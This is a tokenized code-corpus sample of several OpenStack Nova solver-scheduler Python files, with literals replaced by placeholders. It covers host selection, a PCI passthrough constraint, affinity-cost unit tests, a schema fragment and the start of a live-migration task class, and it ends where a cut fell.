'<STR_LIT>' : num_instances , <EOL> '<STR_LIT>' : instance_uuids , <EOL> '<STR_LIT>' : solver_cache } ) <EOL> self . populate_filter_properties ( request_spec , filter_properties ) <EOL> selected_hosts = self . _get_selected_hosts ( context , filter_properties ) <EOL> filter_properties . pop ( '<STR_LIT>' ) <EOL> return selected_hosts <EOL> def _get_selected_hosts ( self , context , filter_properties ) : <EOL> """<STR_LIT>""" <EOL> elevated = context . elevated ( ) <EOL> hosts = self . _get_all_host_states ( elevated ) <EOL> selected_hosts = [ ] <EOL> hosts = self . host_manager . get_hosts_stripping_ignored_and_forced ( <EOL> hosts , filter_properties ) <EOL> list_hosts = list ( hosts ) <EOL> LOG . debug ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : list_hosts } ) <EOL> LOG . debug ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : filter_properties } ) <EOL> host_instance_combinations = self . hosts_solver . solve ( <EOL> list_hosts , filter_properties ) <EOL> LOG . debug ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : host_instance_combinations } ) <EOL> selected_hosts = [ weights . WeighedHost ( host , <NUM_LIT:1> ) <EOL> for ( host , instance ) in host_instance_combinations ] <EOL> return selected_hosts </s>
<s> import copy <EOL> from oslo_log import log as logging <EOL> from nova . i18n import _LW <EOL> from nova_solverscheduler . scheduler . solvers import constraints <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class PciPassthroughConstraint ( constraints . BaseLinearConstraint ) : <EOL> """<STR_LIT>""" <EOL> def _get_acceptable_pci_requests_times ( self , max_times_to_try , <EOL> pci_requests , host_pci_stats ) : <EOL> acceptable_times = <NUM_LIT:0> <EOL> while acceptable_times < max_times_to_try : <EOL> if host_pci_stats . support_requests ( pci_requests ) : <EOL> acceptable_times += <NUM_LIT:1> <EOL> host_pci_stats . apply_requests ( pci_requests ) <EOL> else : <EOL> break <EOL> return acceptable_times <EOL> def get_constraint_matrix ( self , hosts , filter_properties ) : <EOL> num_hosts = len ( hosts ) <EOL> num_instances = filter_properties . get ( '<STR_LIT>' ) <EOL> constraint_matrix = [ [ True for j in xrange ( num_instances ) ] <EOL> for i in xrange ( num_hosts ) ] <EOL> pci_requests = filter_properties . get ( '<STR_LIT>' ) <EOL> if not pci_requests : <EOL> LOG . warn ( _LW ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> return constraint_matrix <EOL> for i in xrange ( num_hosts ) : <EOL> host_pci_stats = copy . deepcopy ( hosts [ i ] . pci_stats ) <EOL> acceptable_num_instances = ( <EOL> self . _get_acceptable_pci_requests_times ( num_instances , <EOL> pci_requests , host_pci_stats ) ) <EOL> if acceptable_num_instances < num_instances : <EOL> inacceptable_num = num_instances - acceptable_num_instances <EOL> constraint_matrix [ i ] = ( <EOL> [ True for j in xrange ( acceptable_num_instances ) ] + <EOL> [ False for j in xrange ( inacceptable_num ) ] ) <EOL> LOG . debug ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { '<STR_LIT:host>' : hosts [ i ] , <EOL> '<STR_LIT>' : acceptable_num_instances } ) <EOL> return constraint_matrix </s>
<s> import mock <EOL> from nova import context <EOL> from nova import test <EOL> from nova_solverscheduler . scheduler . solvers . constraints import aggregate_num_instances <EOL> from nova_solverscheduler . tests . scheduler import solver_scheduler_fakes as fakes <EOL> class TestAggregateNumInstancesConstraint ( test . NoDBTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestAggregateNumInstancesConstraint , self ) . setUp ( ) <EOL> self . constraint_cls = aggregate_num_instances . AggregateNumInstancesConstraint <EOL> self . context = context . RequestContext ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . _generate_fake_constraint_input ( ) <EOL> def _generate_fake_constraint_input ( self ) : <EOL> self . fake_filter_properties = { <EOL> '<STR_LIT>' : self . context , <EOL> '<STR_LIT>' : <NUM_LIT:3> } <EOL> host1 = fakes . FakeSolverSchedulerHostState ( '<STR_LIT>' , '<STR_LIT>' , { } ) <EOL> host2 = fakes . FakeSolverSchedulerHostState ( '<STR_LIT>' , '<STR_LIT>' , { } ) <EOL> host3 = fakes . FakeSolverSchedulerHostState ( '<STR_LIT>' , '<STR_LIT>' , { } ) <EOL> host4 = fakes . FakeSolverSchedulerHostState ( '<STR_LIT>' , '<STR_LIT>' , { } ) <EOL> self . fake_hosts = [ host1 , host2 , host3 , host4 ] <EOL> @ mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def test_get_constraint_matrix ( self , agg_mock ) : <EOL> self . flags ( max_instances_per_host = <NUM_LIT:1> ) <EOL> def _agg_mock_side_effect ( * args , ** kwargs ) : <EOL> if args [ <NUM_LIT:0> ] . host == '<STR_LIT>' : <EOL> return set ( [ '<STR_LIT:2>' , '<STR_LIT:3>' ] ) <EOL> if args [ <NUM_LIT:0> ] . host == '<STR_LIT>' : <EOL> return set ( [ '<STR_LIT:4>' ] ) <EOL> if args [ <NUM_LIT:0> ] . host == '<STR_LIT>' : <EOL> return set ( [ ] ) <EOL> if args [ <NUM_LIT:0> ] . host == '<STR_LIT>' : <EOL> return set ( [ '<STR_LIT>' ] ) <EOL> agg_mock . side_effect = _agg_mock_side_effect <EOL> expected_cons_mat = [ <EOL> [ True , True , False ] , <EOL> [ True , True , True ] , <EOL> [ True , False , False ] , <EOL> [ True , False , False ] ] <EOL> cons_mat = self . constraint_cls ( ) . get_constraint_matrix ( <EOL> self . fake_hosts , self . fake_filter_properties ) <EOL> agg_mock . assert_any_call ( self . fake_hosts [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> agg_mock . assert_any_call ( self . fake_hosts [ <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> agg_mock . assert_any_call ( self . fake_hosts [ <NUM_LIT:2> ] , '<STR_LIT>' ) <EOL> agg_mock . assert_any_call ( self . fake_hosts [ <NUM_LIT:3> ] , '<STR_LIT>' ) <EOL> self . assertEqual ( expected_cons_mat , cons_mat ) </s>
<s> """<STR_LIT>""" <EOL> from nova import context <EOL> from nova import objects <EOL> from nova import test <EOL> from nova_solverscheduler . scheduler . solvers import costs <EOL> from nova_solverscheduler . scheduler . solvers . costs import affinity_cost <EOL> from nova_solverscheduler . tests . scheduler import solver_scheduler_fakes as fakes <EOL> class TestAffinityCost ( test . NoDBTestCase ) : <EOL> USES_DB = True <EOL> def setUp ( self ) : <EOL> super ( TestAffinityCost , self ) . setUp ( ) <EOL> self . context = context . RequestContext ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . cost_handler = costs . CostHandler ( ) <EOL> self . cost_classes = self . cost_handler . get_matching_classes ( <EOL> [ '<STR_LIT>' <EOL> '<STR_LIT>' ] ) <EOL> def _get_fake_hosts ( self ) : <EOL> host1 = fakes . FakeSolverSchedulerHostState ( '<STR_LIT>' , '<STR_LIT>' , { } ) <EOL> host2 = fakes . FakeSolverSchedulerHostState ( '<STR_LIT>' , '<STR_LIT>' , { } ) <EOL> host3 = fakes . FakeSolverSchedulerHostState ( '<STR_LIT>' , '<STR_LIT>' , { } ) <EOL> host4 = fakes . FakeSolverSchedulerHostState ( '<STR_LIT>' , '<STR_LIT>' , { } ) <EOL> return [ host1 , host2 , host3 , host4 ] <EOL> def test_affinity_cost_multiplier ( self ) : <EOL> self . flags ( affinity_cost_multiplier = <NUM_LIT:0.5> , group = '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:0.5> , affinity_cost . AffinityCost ( ) . cost_multiplier ( ) ) <EOL> def test_get_extended_cost_matrix_one_inst ( self ) : <EOL> fake_hosts = self . _get_fake_hosts ( ) <EOL> instance = objects . Instance ( uuid = '<STR_LIT>' ) <EOL> instance_uuid = instance . uuid <EOL> fake_hosts [ <NUM_LIT:1> ] . instances = { instance_uuid : instance } <EOL> fake_filter_properties = { <EOL> '<STR_LIT>' : self . context . elevated ( ) , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in range ( <NUM_LIT:3> ) ] , <EOL> '<STR_LIT>' : { '<STR_LIT>' : instance_uuid } <EOL> } <EOL> fake_cost = self . cost_classes [ <NUM_LIT:0> ] ( ) <EOL> expected_x_cost_mat = [ <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:2> ] , <EOL> [ <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:2> , - <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:2> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:2> ] ] <EOL> x_cost_mat = fake_cost . get_extended_cost_matrix ( fake_hosts , <EOL> fake_filter_properties ) <EOL> self . assertEqual ( expected_x_cost_mat , x_cost_mat ) <EOL> def test_get_extended_cost_matrix_multi_inst ( self ) : <EOL> fake_hosts = self . _get_fake_hosts ( ) <EOL> instance1 = objects . Instance ( uuid = '<STR_LIT>' ) <EOL> instance2 = objects . Instance ( uuid = '<STR_LIT>' ) <EOL> instance1_uuid = instance1 . uuid <EOL> instance2_uuid = instance2 . uuid <EOL> fake_hosts [ <NUM_LIT:0> ] . instances = { instance1_uuid : instance1 } <EOL> fake_hosts [ <NUM_LIT:2> ] . instances = { instance2_uuid : instance2 } <EOL> fake_filter_properties = { <EOL> '<STR_LIT>' : self . context . elevated ( ) , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in range ( <NUM_LIT:3> ) ] , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <EOL> [ instance1_uuid , instance2_uuid ] } <EOL> } <EOL> fake_cost = self . cost_classes [ <NUM_LIT:0> ] ( ) <EOL> expected_x_cost_mat = [ <EOL> [ <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:2> , - <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:2> ] , <EOL> [ <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:2> , - <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:2> ] ] <EOL> x_cost_mat = fake_cost . get_extended_cost_matrix ( fake_hosts , <EOL> fake_filter_properties ) <EOL> self . assertEqual ( expected_x_cost_mat , x_cost_mat ) <EOL> def test_get_extended_cost_matrix_change_multiplier ( self ) : <EOL> self . flags ( affinity_cost_multiplier = <NUM_LIT:0.5> , group = '<STR_LIT>' ) <EOL> fake_hosts = self . _get_fake_hosts ( ) <EOL> instance1 = objects . Instance ( uuid = '<STR_LIT>' ) <EOL> instance2 = objects . Instance ( uuid = '<STR_LIT>' ) <EOL> instance1_uuid = instance1 . uuid <EOL> instance2_uuid = instance2 . uuid <EOL> fake_hosts [ <NUM_LIT:0> ] . instances = { instance1_uuid : instance1 } <EOL> fake_hosts [ <NUM_LIT:2> ] . instances = { instance2_uuid : instance2 } <EOL> fake_filter_properties = { <EOL> '<STR_LIT>' : self . context . elevated ( ) , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in range ( <NUM_LIT:3> ) ] , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <EOL> [ instance1_uuid , instance2_uuid ] } <EOL> } <EOL> fake_cost = self . cost_classes [ <NUM_LIT:0> ] ( ) <EOL> expected_x_cost_mat = [ <EOL> [ <NUM_LIT:0> , - <NUM_LIT:2> , - <NUM_LIT:4> , - <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:3> , - <NUM_LIT:5> ] , <EOL> [ <NUM_LIT:0> , - <NUM_LIT:2> , - <NUM_LIT:4> , - <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:3> , - <NUM_LIT:5> ] ] <EOL> x_cost_mat = fake_cost . get_extended_cost_matrix ( fake_hosts , <EOL> fake_filter_properties ) <EOL> self . assertEqual ( expected_x_cost_mat , x_cost_mat ) <EOL> def test_get_extended_cost_matrix_zero_multiplier ( self ) : <EOL> self . flags ( affinity_cost_multiplier = <NUM_LIT:0> , group = '<STR_LIT>' ) <EOL> fake_hosts = self . _get_fake_hosts ( ) <EOL> instance = objects . Instance ( uuid = '<STR_LIT>' ) <EOL> instance_uuid = instance . uuid <EOL> fake_hosts [ <NUM_LIT:1> ] . instances = { instance_uuid : instance } <EOL> fake_filter_properties = { <EOL> '<STR_LIT>' : self . context . elevated ( ) , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in range ( <NUM_LIT:3> ) ] , <EOL> '<STR_LIT>' : { '<STR_LIT>' : instance_uuid } <EOL> } <EOL> fake_cost = self . cost_classes [ <NUM_LIT:0> ] ( ) <EOL> expected_x_cost_mat = [ <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] <EOL> x_cost_mat = fake_cost . get_extended_cost_matrix ( fake_hosts , <EOL> fake_filter_properties ) <EOL> self . assertEqual ( expected_x_cost_mat , x_cost_mat ) <EOL> def test_get_extended_cost_matrix_no_instance_list ( self ) : <EOL> fake_hosts = self . _get_fake_hosts ( ) <EOL> fake_filter_properties = { <EOL> '<STR_LIT>' : self . context . elevated ( ) , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in range ( <NUM_LIT:3> ) ] , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } <EOL> } <EOL> fake_cost = self . cost_classes [ <NUM_LIT:0> ] ( ) <EOL> expected_x_cost_mat = [ <EOL> [ - <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:2> , - <NUM_LIT:3> ] , <EOL> [ - <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:2> , - <NUM_LIT:3> ] , <EOL> [ - <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:2> , - <NUM_LIT:3> ] , <EOL> [ - <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:2> , - <NUM_LIT:3> ] ] <EOL> x_cost_mat = fake_cost . get_extended_cost_matrix ( fake_hosts , <EOL> fake_filter_properties ) <EOL> self . assertEqual ( expected_x_cost_mat , x_cost_mat ) <EOL> def test_get_extended_cost_matrix_no_hint ( self ) : <EOL> fake_hosts = self . _get_fake_hosts ( ) <EOL> fake_filter_properties = { <EOL> '<STR_LIT>' : self . context . elevated ( ) , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in range ( <NUM_LIT:3> ) ] , <EOL> '<STR_LIT>' : { } <EOL> } <EOL> fake_cost = self . cost_classes [ <NUM_LIT:0> ] ( ) <EOL> expected_x_cost_mat = [ <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] <EOL> x_cost_mat = fake_cost . get_extended_cost_matrix ( fake_hosts , <EOL> fake_filter_properties ) <EOL> self . assertEqual ( expected_x_cost_mat , x_cost_mat ) <EOL> class TestAntiAffinityCost ( test . NoDBTestCase ) : <EOL> USES_DB = True <EOL> def setUp ( self ) : <EOL> super ( TestAntiAffinityCost , self ) . setUp ( ) <EOL> self . context = context . RequestContext ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . cost_handler = costs . CostHandler ( ) <EOL> self . cost_classes = self . cost_handler . get_matching_classes ( <EOL> [ '<STR_LIT>' <EOL> '<STR_LIT>' ] ) <EOL> def _get_fake_hosts ( self ) : <EOL> host1 = fakes . FakeSolverSchedulerHostState ( '<STR_LIT>' , '<STR_LIT>' , { } ) <EOL> host2 = fakes . FakeSolverSchedulerHostState ( '<STR_LIT>' , '<STR_LIT>' , { } ) <EOL> host3 = fakes . FakeSolverSchedulerHostState ( '<STR_LIT>' , '<STR_LIT>' , { } ) <EOL> host4 = fakes . FakeSolverSchedulerHostState ( '<STR_LIT>' , '<STR_LIT>' , { } ) <EOL> return [ host1 , host2 , host3 , host4 ] <EOL> def test_anti_affinity_cost_multiplier ( self ) : <EOL> self . flags ( anti_affinity_cost_multiplier = <NUM_LIT:2> , group = '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:2> , <EOL> affinity_cost . AntiAffinityCost ( ) . cost_multiplier ( ) ) <EOL> def test_get_extended_cost_matrix_one_inst ( self ) : <EOL> fake_hosts = self . _get_fake_hosts ( ) <EOL> instance = objects . Instance ( uuid = '<STR_LIT>' ) <EOL> instance_uuid = instance . uuid <EOL> fake_hosts [ <NUM_LIT:1> ] . instances = { instance_uuid : instance } <EOL> fake_filter_properties = { <EOL> '<STR_LIT>' : self . context . elevated ( ) , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in range ( <NUM_LIT:3> ) ] , <EOL> '<STR_LIT>' : { '<STR_LIT>' : instance_uuid } <EOL> } <EOL> fake_cost = self . cost_classes [ <NUM_LIT:0> ] ( ) <EOL> expected_x_cost_mat = [ <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ] <EOL> x_cost_mat = fake_cost . get_extended_cost_matrix ( fake_hosts , <EOL> fake_filter_properties ) <EOL> self . assertEqual ( expected_x_cost_mat , x_cost_mat ) <EOL> def test_get_extended_cost_matrix_multi_inst ( self ) : <EOL> fake_hosts = self . _get_fake_hosts ( ) <EOL> instance1 = objects . Instance ( uuid = '<STR_LIT>' ) <EOL> instance2 = objects . Instance ( uuid = '<STR_LIT>' ) <EOL> instance1_uuid = instance1 . uuid <EOL> instance2_uuid = instance2 . uuid <EOL> fake_hosts [ <NUM_LIT:0> ] . instances = { instance1_uuid : instance1 } <EOL> fake_hosts [ <NUM_LIT:2> ] . instances = { instance2_uuid : instance2 } <EOL> fake_filter_properties = { <EOL> '<STR_LIT>' : self . context . elevated ( ) , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in range ( <NUM_LIT:3> ) ] , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <EOL> [ instance1_uuid , instance2_uuid ] } <EOL> } <EOL> fake_cost = self . cost_classes [ <NUM_LIT:0> ] ( ) <EOL> expected_x_cost_mat = [ <EOL> [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ] <EOL> x_cost_mat = fake_cost . get_extended_cost_matrix ( fake_hosts , <EOL> fake_filter_properties ) <EOL> self . assertEqual ( expected_x_cost_mat , x_cost_mat ) <EOL> def test_get_extended_cost_matrix_change_multiplier ( self ) : <EOL> self . flags ( anti_affinity_cost_multiplier = <NUM_LIT:0.5> , <EOL> group = '<STR_LIT>' ) <EOL> fake_hosts = self . _get_fake_hosts ( ) <EOL> instance1 = objects . Instance ( uuid = '<STR_LIT>' ) <EOL> instance2 = objects . Instance ( uuid = '<STR_LIT>' ) <EOL> instance1_uuid = instance1 . uuid <EOL> instance2_uuid = instance2 . uuid <EOL> fake_hosts [ <NUM_LIT:0> ] . instances = { instance1_uuid : instance1 } <EOL> fake_hosts [ <NUM_LIT:2> ] . instances = { instance2_uuid : instance2 } <EOL> fake_filter_properties = { <EOL> '<STR_LIT>' : self . context . elevated ( ) , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in range ( <NUM_LIT:3> ) ] , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <EOL> [ instance1_uuid , instance2_uuid ] } <EOL> } <EOL> fake_cost = self . cost_classes [ <NUM_LIT:0> ] ( ) <EOL> expected_x_cost_mat = [ <EOL> [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:7> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:7> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:6> ] ] <EOL> x_cost_mat = fake_cost . get_extended_cost_matrix ( fake_hosts , <EOL> fake_filter_properties ) <EOL> self . assertEqual ( expected_x_cost_mat , x_cost_mat ) <EOL> def test_get_extended_cost_matrix_zero_multiplier ( self ) : <EOL> self . flags ( anti_affinity_cost_multiplier = <NUM_LIT:0> , group = '<STR_LIT>' ) <EOL> fake_hosts = self . _get_fake_hosts ( ) <EOL> instance = objects . Instance ( uuid = '<STR_LIT>' ) <EOL> instance_uuid = instance . uuid <EOL> fake_hosts [ <NUM_LIT:1> ] . instances = { instance_uuid : instance } <EOL> fake_filter_properties = { <EOL> '<STR_LIT>' : self . context . elevated ( ) , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in range ( <NUM_LIT:3> ) ] , <EOL> '<STR_LIT>' : { '<STR_LIT>' : instance_uuid } <EOL> } <EOL> fake_cost = self . cost_classes [ <NUM_LIT:0> ] ( ) <EOL> expected_x_cost_mat = [ <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] <EOL> x_cost_mat = fake_cost . get_extended_cost_matrix ( fake_hosts , <EOL> fake_filter_properties ) <EOL> self . assertEqual ( expected_x_cost_mat , x_cost_mat ) <EOL> def test_get_extended_cost_matrix_no_instance_list ( self ) : <EOL> fake_hosts = self . _get_fake_hosts ( ) <EOL> fake_filter_properties = { <EOL> '<STR_LIT>' : self . context . elevated ( ) , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in range ( <NUM_LIT:3> ) ] , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } <EOL> } <EOL> fake_cost = self . cost_classes [ <NUM_LIT:0> ] ( ) <EOL> expected_x_cost_mat = [ <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ] <EOL> x_cost_mat = fake_cost . get_extended_cost_matrix ( fake_hosts , <EOL> fake_filter_properties ) <EOL> self . assertEqual ( expected_x_cost_mat , x_cost_mat ) <EOL> def test_get_extended_cost_matrix_no_hint ( self ) : <EOL> fake_hosts = self . _get_fake_hosts ( ) <EOL> fake_filter_properties = { <EOL> '<STR_LIT>' : self . context . elevated ( ) , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in range ( <NUM_LIT:3> ) ] , <EOL> '<STR_LIT>' : { } <EOL> } <EOL> fake_cost = self . cost_classes [ <NUM_LIT:0> ] ( ) <EOL> expected_x_cost_mat = [ <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] <EOL> x_cost_mat = fake_cost . get_extended_cost_matrix ( fake_hosts , <EOL> fake_filter_properties ) <EOL> self . assertEqual ( expected_x_cost_mat , x_cost_mat ) </s>
<s> tag = { <EOL> "<STR_LIT:type>" : "<STR_LIT:string>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> update_all = { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:type>" : "<STR_LIT:string>" <EOL> } <EOL> } , <EOL> "<STR_LIT:title>" : "<STR_LIT>" , <EOL> "<STR_LIT:type>" : "<STR_LIT:object>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> } <EOL> } , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : False <EOL> } <EOL> update = { <EOL> "<STR_LIT:title>" : "<STR_LIT>" , <EOL> "<STR_LIT:type>" : "<STR_LIT:null>" , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : False <EOL> } </s>
<s> from oslo_log import log as logging <EOL> import oslo_messaging as messaging <EOL> import six <EOL> from nova . compute import power_state <EOL> from nova . conductor . tasks import base <EOL> import nova . conf <EOL> from nova import exception <EOL> from nova . i18n import _ <EOL> from nova import objects <EOL> from nova . scheduler import utils as scheduler_utils <EOL> from nova import utils <EOL> LOG = logging . getLogger ( __name__ ) <EOL> CONF = nova . conf . CONF <EOL> class LiveMigrationTask ( base . TaskBase ) : <EOL> def __init__ ( self , context , instance , destination , <EOL> block_migration , disk_over_commit , migration , compute_rpcapi , <EOL> servicegroup_api , scheduler_client , request_spec = None ) : <EOL> super ( LiveMigrationTask , self ) . __init__ ( context , instance ) <EOL> self . destination = destination <EOL> self . block_migration = block_migration <EOL> self . disk_over_commit = disk_over_commit <EOL> self . migration = migration <EOL> self . source = instance . host <EOL> self . migrate_data = None <EOL> self . compute_rpcapi = compute_rpcapi <EOL> self . servicegroup_api = servicegroup_api <EOL> self . scheduler_client = scheduler_client <EOL> self . request_spec = request_spec <EOL> def _execute ( self ) : <EOL> self . _check_instance_is_active ( ) <EOL> self . _check_host_is_up ( self . source ) <EOL> if not self . destination : <EOL> self . destination = self . _find_destination ( ) <EOL> self . migration . dest_compute = self . destination <EOL> self . migration . save ( ) <EOL> else : <EOL> self . _check_requested_destination ( ) <EOL> return self . compute_rpcapi . live_migration ( self . context , <EOL> host = self . source , <EOL> instance = self . instance , <EOL> dest = self . destination , <EOL> block_migration = self . block_migration , <EOL> migration = self . migration , <EOL> migrate_data = self . migrate_data ) <EOL> def rollback ( self ) : <EOL> pass <EOL> def _check_instance_is_active ( self ) : <EOL> if self . instance . power_state not in ( power_state . RUNNING , <EOL> power_state . PAUSED ) : <EOL> raise exception . InstanceInvalidState ( <EOL> instance_uuid = self . instance . uuid , <EOL> attr = '<STR_LIT>' , <EOL> state = self . instance . power_state , <EOL> method = '<STR_LIT>' ) <EOL> def _check_host_is_up ( self , host ) : <EOL> try : <EOL> service = objects . Service . get_by_compute_host ( self . context , host ) <EOL> except exception . NotFound : <EOL> raise exception . ComputeServiceUnavailable ( host = host ) <EOL> if not self . servicegroup_api . service_is_up ( service ) : <EOL> raise exception . ComputeServiceUnavailable ( host = host ) <EOL> def _check_requested_destination ( self ) : <EOL> self . _check_destination_is_not_source ( ) <EOL> self . _check_host_is_up ( self . destination ) <EOL> self . _check_destination_has_enough_memory ( ) <EOL> self . _check_compatible_with_source_hypervisor ( self . destination ) <EOL> self . _call_livem_checks_on_host ( self . destination ) <EOL> def _check_destination_is_not_source ( self ) : <EOL> if self . destination == self . source : <EOL> raise exception . UnableToMigrateToSelf ( <EOL> instance_id = self . instance . uuid , host = self . destination ) <EOL> def _check_destination_has_enough_memory ( self ) : <EOL> compute = self . _get_compute_info ( self . destination ) <EOL> free_ram_mb = compute . free_ram_mb <EOL> total_ram_mb = compute . memory_mb <EOL> mem_inst = self . instance . memory_mb <EOL> ram_ratio = compute . 